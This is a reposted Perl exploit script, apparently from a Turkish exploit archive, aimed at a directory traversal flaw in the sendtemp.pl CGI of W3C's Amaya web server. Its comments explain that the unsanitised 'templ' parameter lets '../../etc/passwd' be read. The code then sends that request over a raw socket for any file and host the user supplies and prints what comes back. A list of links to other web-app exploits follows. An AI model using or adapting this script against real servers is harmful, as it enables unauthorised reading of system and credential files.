Eklenme Tarihi: 2008-10-20 22:59
#!/usr/bin/perl -w
# sendtemp.pl: A part of the Amaya Web development
# server contains a file disclosure vulnerability,
# which allows remote, read access to files
# on the servers file system, as whichever
# user the httpd is running as.
#
# The Vulnerability is really quite simple..
# When the `templ` argument is past to
# sendtemp.pl it adds a link to the chosen stylesheet
# and a META field containing the publication's
# URL of the new file to the chosen template.
# For example:
#
http://localhost/cgi-bin/sendtemp.pl?templ=template.xml
# This is all well and good, however..
# There is no sanity checking on the param you pass to the script..
# Ie: my $temp_file = param("templ");
#
# So by simply issuing a GET to:
# "http://localhost/cgi-bin/sendtemp.pl?templ=../../etc/passwd"
# The systems file system can be traversed and the passwd file can be read.
# (Assuming the http daemon hasn't been run under chroot())
#
# Follows is a simple exploit.. however, its just as easy
# to do this manually in your web browser.
# I really couldnt be bothered to format the output in any way,
# It only encourages script kiddies.
#
# Finally, "l33t hax0r greetz" to..
# ne0h, b0red, loophole, shad0w and the old dL crew..
# Scott, Jim, Mike.. All of the guys at Global Intersec.
#
# Tom Parker -
tom@rooted.net
# MRX of HHP-Programming (www.hhp-programming.net)
# Global InterSec INC California - Security Audits, Penetration testing, code auditing.
use IO::Socket;
print qq~
----------------------------------------------------------
W3.ORG sendtemp.pl exploit by Tom Parker - tom\@rooted.net
MRX of HHP-Programming (www.hhp-programming.net)
- Global InterSec INC California -
----------------------------------------------------------
~;
if((!defined($ARGV[0]))||(!defined($ARGV[1]))) { print "Usage\: \%filename\.pl \<hostname\> \<file-to-get\>\n"; exit 0; }
$SOCKET = IO::Socket::INET->new("$ARGV[0]:80");
print $SOCKET "GET /cgi-bin/sendtemp.pl?templ=$ARGV[1]\n";
print "Sent request for $ARGV[1] (http://$ARGV[0]/cgi-bin/sendtemp.pl\?templ\=$ARGV[1])\n";
while(<$SOCKET>) {
push @DATA, $_;
}
my $woot = join(' ',@DATA);
if($woot =~/$ARGV[1] wasn't found/) { print "$ARGV[1] dosnt seem to exist.\n"; exit 0; }
else { print "@DATA"; }
Keywords:
Benzer Sayfalar (Similar Pages):
Bulunamadı. (not found)
Bu Sayfalarda İlginizi Çekebilir (The Links Bellow May Attract You As Well):
Exploit /
Web Apps Exploit /
Turbo Seek Null Byte Error Discloses Files to Remote Users Exploit /
Web Apps Exploit /
UBB.threads 6.2.*-6.3.* one char bruteforce exploitExploit /
Web Apps Exploit /
PostNuke <= 0.750 readpmsg.php SQL Injection ExploitExploit /
Web Apps Exploit /
FarsiNews <= 2.5 Directory Traversal Arbitrary (users.db) Access ExploitExploit /
Web Apps Exploit /
GuestBook Script <= 1.7 (include_files) Remote Code Execution ExploitExploit /
Web Apps Exploit /
UBB Threads 6.4.x-6.5.2 (thispath) Remote File Inclusion VulnerabilityExploit /
Web Apps Exploit /
UBB Threads < 6.5.2 Beta (mailthread.php) SQL Injection ExploitExploit /
Web Apps Exploit /
PHP-Fusion <= 6.00.105 Accessible Database Backups Download ExploitExploit /
Web Apps Exploit /
Etomite CMS <= 0.6.1 (rfiles.php) Remote Command Execution ExploitExploit /
Web Apps Exploit /
SendCard <= 3.4.0 Unauthorized Administrative Access ExploitExploit /
Web Apps Exploit /
phpProfiles 2.1 Beta Multiple Remote File Include VulnerabilitiesExploit /
Web Apps Exploit /
phpProfiles <= 3.1.2b Multiple Remote File Include VulnerabilitiesExploit /
Web Apps Exploit /
Cahier de texte 2.2 Bypass General Access Protection ExploitExploit /
Web Apps Exploit /
Mani Stats Reader <= 1.2 (ipath) Remote File Include VulnerabilityExploit /
Web Apps Exploit /
Creative Files 1.2 (kommentare.php) Remote SQL Injection VulnerabilityExploit /
Web Apps Exploit /
Crea-Book <= 1.0 Admin Access Bypass / DB Disclosure / Code ExecutionExploit /
Web Apps Exploit /
e107 0.7.8 (mailout.php) Access Escalation Exploit (admin needed)Exploit /
Web Apps Exploit /
CreaDirectory 1.2 (error.asp id) Remote SQL Injection VulnerabilityExploit /
Web Apps Exploit /
Joomla Component RSfiles <= 1.0.2 (path) File Download VulnerabilityExploit /
Web Apps Exploit /
Weblogicnet (files_dir) Multiple Remote File Inclusion VulnerabilitiesExploit /
Web Apps Exploit /
SocketMail 2.2.8 fnc-readmail3.php Remote File Inclusion VulnerabilityExploit /
Web Apps Exploit /
Eurologon CMS files.php Arbitrary File Download VulnerabilityExploit /
Web Apps Exploit /
Adult Script <= 1.6 Unauthorized Administrative Access Exploit Exploit /
Web Apps Exploit /
Seagull 0.6.3 (optimizer.php files) Remote File Disclosure VulnerabilityExploit /
Web Apps Exploit /
nuBoard 0.5 (threads.php ssid) SQL Injection VulnerabilityExploit /
Web Apps Exploit /
Wordpress Plugin Spreadsheet <= 0.6 SQL Injection VulnerabilityExploit /
Web Apps Exploit /
ActiveKB <= 1.5 Insecure Cookie Handling/Arbitrary Admin AccessExploit /
Web Apps Exploit /
AlkalinePHP <= 0.80.00 beta (thread.php id) SQL Injection ExploitExploit /
Web Apps Exploit /
JiRo´s FAQ Manager (read.asp fID) SQL Injection VulnerabilityExploit /
Web Apps Exploit /
@CMS 2.1.1 (readarticle.php article_id) SQL Injection Vulnerability